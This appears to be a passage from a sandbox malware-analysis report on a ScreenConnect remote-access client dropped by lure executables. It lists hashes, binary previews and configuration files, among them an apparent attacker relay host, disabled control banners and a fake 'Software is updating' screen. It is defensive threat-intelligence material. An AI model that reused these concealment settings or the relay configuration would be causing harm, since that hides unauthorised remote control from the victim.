SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse Filename: E_BILL9926378035.exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse Filename: He6pI1bhcA.exe, Detection: malicious, Browse Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse Filename: VD01NDHM8u.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse Filename: E_BILL9926378035.exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse Filename: He6pI1bhcA.exe, Detection: malicious, Browse Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse Filename: VD01NDHM8u.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\Client.Override.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	369
Entropy (8bit):	4.898555474937936
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l1tYMHwerc4KC:rHy2DLI4MWoHO8L9cAgRMZRCl1tYMHc6
MD5:	E6669504E0A5F3812CD3FE666F67F1EC
SHA1:	E552F6177354764FAFC0524CD24D5949ECFB1C70
SHA-256:	C15626455A649C93BF68D28A8296A0265ECC0A890EC301A435DAB03A1828884F
SHA-512:	F5ADA663869C1284FE85F2F49E88C2493DAE9C505F7452309DB167B2DD1F5CF6AB67838741ED0FB03C87ED443815BD4119FB0EE47E141D39A1E443DA4172EF41
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.@....>Software is updating... Please do not turn off your computer!...Updateing

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\Client.Override.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	257
Entropy (8bit):	4.896176001960815
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
MD5:	C72D7889B5E0BB8AC27B83759F108BD8
SHA1:	2BECC870DB304A8F28FAAB199AE6834B97385551
SHA-256:	3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
SHA-512:	2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\Client.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	50133
Entropy (8bit):	4.759054454534641
Encrypted:	false
SSDEEP:	1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
MD5:	D524E8E6FD04B097F0401B2B668DB303
SHA1:	9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
SHA-256:	07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
SHA-512:	E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\Client.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\app.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	4.690426481732819
Encrypted:	false
SSDEEP:	48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
MD5:	2744E91BB44E575AD8E147E06F8199E3
SHA1:	6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
SHA-256:	805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
SHA-512:	586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
Malicious:	false
Preview:	<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\pj2mbdlz.newcfg

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.042876835377422
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO0Y81v7TVv/vXbAa3xT:2dL9hK6E46YPt8JFvH
MD5:	0AFFE6B30C1B82A04C5BD28A289F8FD0
SHA1:	3C7C11FCCC3CDF868A5171D5FAB96AA54F01779E
SHA-256:	509F9909D24F034B6CD5CED0019F6E91CFA526C4FB9F0F7DE7FA708792BEBB50
SHA-512:	E253E03AEBBA34599BDF410E2939F45ADF1C066A740F60E792EB25F356F56839C6A39E89BD56242948D6CA8E546F88D29FAAAB09B1C7168712AEAD83CE8BF950
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>mmf351.ddns.net=79.110.49.16-02%2f10%2f2024%2004%3a25%3a37</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\user.config (copy)

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
